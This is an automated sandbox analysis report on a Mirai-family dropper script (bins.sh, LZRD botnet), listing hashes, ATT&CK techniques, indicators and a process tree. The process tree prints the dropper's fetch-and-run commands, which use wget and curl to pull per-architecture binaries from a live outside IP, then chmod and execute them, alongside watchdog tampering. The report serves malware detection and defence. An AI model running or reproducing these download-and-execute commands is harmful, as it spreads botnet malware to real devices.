mirai | 3f6b55f3d9803d4e865e0fdbcd26fdedf734723240be51ada16811ab58ec7639

Analysis

max time kernel
148s
max time network
143s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
06/12/2024, 13:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

2KB
MD5

bc08b99cc7c6bc0f035c108a16f77e9d
SHA1

f8dd49443b086d72bbf8626c2366b9084851ecca
SHA256

3f6b55f3d9803d4e865e0fdbcd26fdedf734723240be51ada16811ab58ec7639
SHA512

1a3b3920ddf0b87bbbbc89c531440bb0f1838f4c8094068cd2ce2149c46848d522156f0f3e4a6c7f71a4ac94cd99f27c585b3cbb49bf482d196a761c92903ea8

Score

10^/10

mirai lzrd antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
738	chmod
781	chmod
796	chmod
816	chmod
676	chmod
748	chmod
754	chmod
768	chmod
829	chmod
662	chmod
686	chmod
698	chmod
719	chmod
810	chmod
822	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/swift	664	swift
/tmp/swift	677	swift
/tmp/swift	687	swift
/tmp/swift	700	swift
/tmp/swift	720	swift
/tmp/swift	740	swift
/tmp/swift	749	swift
/tmp/swift	755	swift
/tmp/swift	769	swift
/tmp/swift	783	swift
/tmp/swift	797	swift
/tmp/swift	811	swift
/tmp/swift	817	swift
/tmp/swift	823	swift
/tmp/swift	830	swift

Modifies Watchdog functionality 1 TTPs 4 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	swift
File opened for modification	/dev/misc/watchdog	swift
File opened for modification	/dev/watchdog	swift
File opened for modification	/dev/misc/watchdog	swift

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 4 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	swift
File opened for modification	/bin/watchdog	swift
File opened for modification	/sbin/watchdog	swift
File opened for modification	/bin/watchdog	swift

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-1.dat	upx
behavioral2/files/fstream-4.dat	upx

Checks CPU configuration 1 TTPs 15 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/592/cmdline	swift
File opened for reading	/proc/666/cmdline	swift
File opened for reading	/proc/838/cmdline	swift
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/589/cmdline	swift
File opened for reading	/proc/846/cmdline	swift
File opened for reading	/proc/852/cmdline	swift
File opened for reading	/proc/858/cmdline	swift
File opened for reading	/proc/858/cmdline	swift
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/exe	swift
File opened for reading	/proc/848/cmdline	swift
File opened for reading	/proc/588/cmdline	swift
File opened for reading	/proc/652/cmdline	swift
File opened for reading	/proc/634/cmdline	swift
File opened for reading	/proc/756/cmdline	swift
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/634/cmdline	swift
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/832/cmdline	swift
File opened for reading	/proc/833/cmdline	swift
File opened for reading	/proc/860/cmdline	swift
File opened for reading	/proc/862/cmdline	swift
File opened for reading	/proc/862/cmdline	swift
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/592/cmdline	swift
File opened for reading	/proc/842/cmdline	swift
File opened for reading	/proc/844/cmdline	swift
File opened for reading	/proc/801/cmdline	swift
File opened for reading	/proc/819/cmdline	swift
File opened for reading	/proc/636/cmdline	swift
File opened for reading	/proc/846/cmdline	swift
File opened for reading	/proc/666/cmdline	swift
File opened for reading	/proc/758/cmdline	swift
File opened for reading	/proc/799/cmdline	swift
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/629/cmdline	swift
File opened for reading	/proc/635/cmdline	swift
File opened for reading	/proc/641/cmdline	swift
File opened for reading	/proc/827/cmdline	swift
File opened for reading	/proc/860/cmdline	swift
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/exe	swift
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/exe	swift
File opened for reading	/proc/758/cmdline	swift
File opened for reading	/proc/837/cmdline	swift
File opened for reading	/proc/571/cmdline	swift
File opened for reading	/proc/635/cmdline	swift
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/571/cmdline	swift
File opened for reading	/proc/832/cmdline	swift

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
672	curl
675	cat
677	swift
667	wget

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/SwiftSec.x86	wget
File opened for modification	/tmp/SwiftSec.mpsl	wget
File opened for modification	/tmp/SwiftSec.sh4	wget
File opened for modification	/tmp/SwiftSec.i686	curl
File opened for modification	/tmp/SwiftSec.spc	curl
File opened for modification	/tmp/SwiftSec.arc	curl
File opened for modification	/tmp/SwiftSec.arm6	wget
File opened for modification	/tmp/SwiftSec.mips	curl
File opened for modification	/tmp/SwiftSec.arc	wget
File opened for modification	/tmp/SwiftSec.spc	wget
File opened for modification	/tmp/swift	bins.sh
File opened for modification	/tmp/SwiftSec.arm6	curl
File opened for modification	/tmp/SwiftSec.ppc	curl
File opened for modification	/tmp/SwiftSec.m68k	curl
File opened for modification	/tmp/SwiftSec.i468	curl
File opened for modification	/tmp/SwiftSec.arm	curl
File opened for modification	/tmp/SwiftSec.arm7	wget
File opened for modification	/tmp/SwiftSec.arm7	curl
File opened for modification	/tmp/SwiftSec.ppc	wget
File opened for modification	/tmp/SwiftSec.sh4	curl
File opened for modification	/tmp/SwiftSec.x86	curl
File opened for modification	/tmp/SwiftSec.mips	wget
File opened for modification	/tmp/SwiftSec.x86_64	curl
File opened for modification	/tmp/SwiftSec.arm	wget
File opened for modification	/tmp/SwiftSec.arm5	wget
File opened for modification	/tmp/SwiftSec.mpsl	curl
File opened for modification	/tmp/SwiftSec.arm5	curl
File opened for modification	/tmp/SwiftSec.m68k	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
- Writes file to tmp directory
PID:637
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.x86
  2⤵
  - Writes file to tmp directory
  PID:639
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:650
- /bin/cat
  cat SwiftSec.x86
  2⤵
  PID:661
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.x86 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:662
- /tmp/swift
  ./swift Selfrep.x86
  2⤵
  - Executes dropped EXE
  PID:664
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:667
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.mips
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:672
- /bin/cat
  cat SwiftSec.mips
  2⤵
  - System Network Configuration Discovery
  PID:675
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.mips SwiftSec.x86 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:676
- /tmp/swift
  ./swift Selfrep.mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:677
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.arc
  2⤵
  - Writes file to tmp directory
  PID:679
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.arc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:680
- /bin/cat
  cat SwiftSec.arc
  2⤵
  PID:684
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.arc SwiftSec.mips SwiftSec.x86 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:686
- /tmp/swift
  ./swift Selfrep.arc
  2⤵
  - Executes dropped EXE
  PID:687
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.i468
  2⤵
  PID:689
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.i468
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:693
- /bin/cat
  cat SwiftSec.i468
  2⤵
  PID:697
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.arc SwiftSec.i468 SwiftSec.mips SwiftSec.x86 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:698
- /tmp/swift
  ./swift Selfrep.i468
  2⤵
  - Executes dropped EXE
  PID:700
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.i686
  2⤵
  PID:701
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.i686
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:705
- /bin/cat
  cat SwiftSec.i686
  2⤵
  PID:717
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.arc SwiftSec.i468 SwiftSec.i686 SwiftSec.mips SwiftSec.x86 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:719
- /tmp/swift
  ./swift Selfrep.i686
  2⤵
  - Executes dropped EXE
  PID:720
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.x86_64
  2⤵
  PID:721
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.x86_64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:725
- /bin/cat
  cat SwiftSec.x86_64
  2⤵
  PID:737
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.arc SwiftSec.i468 SwiftSec.i686 SwiftSec.mips SwiftSec.x86 SwiftSec.x86_64 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:738
- /tmp/swift
  ./swift Selfrep.x64
  2⤵
  - Executes dropped EXE
  PID:740
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.mpsl
  2⤵
  - Writes file to tmp directory
  PID:742
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:745
- /bin/cat
  cat SwiftSec.mpsl
  2⤵
  PID:747
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.arc SwiftSec.i468 SwiftSec.i686 SwiftSec.mips SwiftSec.mpsl SwiftSec.x86 SwiftSec.x86_64 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:748
- /tmp/swift
  ./swift Selfrep.mpsl
  2⤵
  - Executes dropped EXE
  PID:749
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.arm
  2⤵
  - Writes file to tmp directory
  PID:751
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:752
- /bin/cat
  cat SwiftSec.arm
  2⤵
  PID:753
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.arc SwiftSec.arm SwiftSec.i468 SwiftSec.i686 SwiftSec.mips SwiftSec.mpsl SwiftSec.x86 SwiftSec.x86_64 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:754
- /tmp/swift
  ./swift Selfrep.arm
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:755
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.arm5
  2⤵
  - Writes file to tmp directory
  PID:759
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:762
- /bin/cat
  cat SwiftSec.arm5
  2⤵
  PID:767
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.arc SwiftSec.arm SwiftSec.arm5 SwiftSec.i468 SwiftSec.i686 SwiftSec.mips SwiftSec.mpsl SwiftSec.x86 SwiftSec.x86_64 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:768
- /tmp/swift
  ./swift Selfrep.arm5
  2⤵
  - Executes dropped EXE
  PID:769
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.arm6
  2⤵
  - Writes file to tmp directory
  PID:771
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:775
- /bin/cat
  cat SwiftSec.arm6
  2⤵
  PID:780
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.arc SwiftSec.arm SwiftSec.arm5 SwiftSec.arm6 SwiftSec.i468 SwiftSec.i686 SwiftSec.mips SwiftSec.mpsl SwiftSec.x86 SwiftSec.x86_64 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:781
- /tmp/swift
  ./swift Selfrep.arm6
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  PID:783
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.arm7
  2⤵
  - Writes file to tmp directory
  PID:784
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.arm7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:789
- /bin/cat
  cat SwiftSec.arm7
  2⤵
  PID:795
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.arc SwiftSec.arm SwiftSec.arm5 SwiftSec.arm6 SwiftSec.arm7 SwiftSec.i468 SwiftSec.i686 SwiftSec.mips SwiftSec.mpsl SwiftSec.x86 SwiftSec.x86_64 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:796
- /tmp/swift
  ./swift Selfrep.arm7
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:797
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.ppc
  2⤵
  - Writes file to tmp directory
  PID:802
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.ppc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:808
- /bin/cat
  cat SwiftSec.ppc
  2⤵
  PID:809
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.arc SwiftSec.arm SwiftSec.arm5 SwiftSec.arm6 SwiftSec.arm7 SwiftSec.i468 SwiftSec.i686 SwiftSec.mips SwiftSec.mpsl SwiftSec.ppc SwiftSec.x86 SwiftSec.x86_64 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:810
- /tmp/swift
  ./swift Selfrep.ppc
  2⤵
  - Executes dropped EXE
  PID:811
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.spc
  2⤵
  - Writes file to tmp directory
  PID:813
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.spc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:814
- /bin/cat
  cat SwiftSec.spc
  2⤵
  PID:815
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.arc SwiftSec.arm SwiftSec.arm5 SwiftSec.arm6 SwiftSec.arm7 SwiftSec.i468 SwiftSec.i686 SwiftSec.mips SwiftSec.mpsl SwiftSec.ppc SwiftSec.spc SwiftSec.x86 SwiftSec.x86_64 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:816
- /tmp/swift
  ./swift Selfrep.sparc
  2⤵
  - Executes dropped EXE
  PID:817
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.m68k
  2⤵
  - Writes file to tmp directory
  PID:819
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.m68k
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:820
- /bin/cat
  cat SwiftSec.m68k
  2⤵
  PID:821
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.arc SwiftSec.arm SwiftSec.arm5 SwiftSec.arm6 SwiftSec.arm7 SwiftSec.i468 SwiftSec.i686 SwiftSec.m68k SwiftSec.mips SwiftSec.mpsl SwiftSec.ppc SwiftSec.spc SwiftSec.x86 SwiftSec.x86_64 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:822
- /tmp/swift
  ./swift Selfrep.m68k
  2⤵
  - Executes dropped EXE
  PID:823
- /usr/bin/wget
  wget http://93.123.85.8/bins/SwiftSec.sh4
  2⤵
  - Writes file to tmp directory
  PID:825
- /usr/bin/curl
  curl -O http://93.123.85.8/bins/SwiftSec.sh4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:826
- /bin/cat
  cat SwiftSec.sh4
  2⤵
  PID:828
- /bin/chmod
  chmod +x bins.sh swift SwiftSec.arc SwiftSec.arm SwiftSec.arm5 SwiftSec.arm6 SwiftSec.arm7 SwiftSec.i468 SwiftSec.i686 SwiftSec.m68k SwiftSec.mips SwiftSec.mpsl SwiftSec.ppc SwiftSec.sh4 SwiftSec.spc SwiftSec.x86 SwiftSec.x86_64 systemd-private-02a04bb707184d66acc4eca724557e31-systemd-timedated.service-JLEyrm
  2⤵
  - File and Directory Permissions Modification
  PID:829
- /tmp/swift
  ./swift Selfrep.sh4
  2⤵
  - Executes dropped EXE
  PID:830

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/SwiftSec.x86

Filesize
20KB

MD5
b8ec9840ce4e9a09d84b1ab23d299271

SHA1
2150b06bb65fe232cd080c22039ef6a0109184cd

SHA256
f20907ae803f42412c58bca0ddb4dc2f7a3ec50a4ac549961b4e2e20365ec9de

SHA512
6b5029737d508d5c75192d91afb75a85604cd2e2c40c3d58e8eb3985ef8d26991578abc7d0d078e1d630e6237a4190bf10a4c1264be749497db9e2bce94fff6e

Download Submit
/tmp/swift

Filesize
23KB

MD5
1f48dd331d55c1b4063c620ee90c741b

SHA1
ba1b11f7e58767712bdc9579dccf3b928e829b42

SHA256
7f46cc4adbe3d3801c2a92ef0a433efa38ba983227a158910a2f7d9c124a5ec4

SHA512
c3e919e5bed69ea4c0fb1e99b0edcc006f15d1c2ef57a65a4ba3b7727869db0d4f9fedac4c1ad7084fe0681eccf0d0eddd10a08f347ecc78cc8f723bd8d17819

Download Submit
/tmp/swift

Filesize
105KB

MD5
d3772d7a0a7128fc86e04c7a519ee0c0

SHA1
1cec2c00294005d376f36ae79782f830b3a49b99

SHA256
1846de2de701c5dc36ec5ba3da71b1cfb475d338721511fd61da6d5971272005

SHA512
98e918ecfc95a3fcaf5286e7cdb6bb98fab24f380e8aed7a3d1366f5294e7206a74416a4ca7dc6bcffe0f4de1a71834f026b5f88fc34e52bc6e91e8cc25974e6

Download Submit
/tmp/swift

Filesize
216B

MD5
a0722d7009ca7344e9ad583180ee787f

SHA1
e8f88e74b4b8f43baf7eb7e6f73624aad70fdbed

SHA256
62e0dda462ecea15a9a7b5f654370f67df59484438668d15642cd02f20f77d4c

SHA512
62ced29be3739b8e25c154d94f2091adde9ab85355f5a879aaa908aab7410763fc465395a49618d2b0596d63c6cacc8684061bc9d7c4a059ad11675cfde35102

Download Submit
/tmp/swift

Filesize
216B

MD5
4e3b83fc1131fee057bc87aa24cd79be

SHA1
90bc9067fde055a64591d9b1aa13d81785f1c1ab

SHA256
b5ed305e8862341ded2b13563a046981a9f2fc975fc4b1b7d7986067a7cd4621

SHA512
8089c6a9b4b7d40d1bfe6c31b00277e9d604fb4d46f250306e7c82c3adb48661af95b322caa792b286f88496ad3d00b0f2567cef3517a2751999dcb3de701e09

Download Submit
/tmp/swift

Filesize
57KB

MD5
ce7c45c70c6a7e713f1acaf835bfbbd8

SHA1
f23983ca814e1c452a2d5efc6341551bc04e2001

SHA256
75efcba53d2968e1a42e107a4e0dd88a398a9bd375e7535d2224b005f7ad191c

SHA512
ed7905b2a24e6ccc95092841e438753f63e9e652531ec1609c534779e16fadf4182087f2b086890f042801691d229072530b27b7e6176e4e51757a14d6620437

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads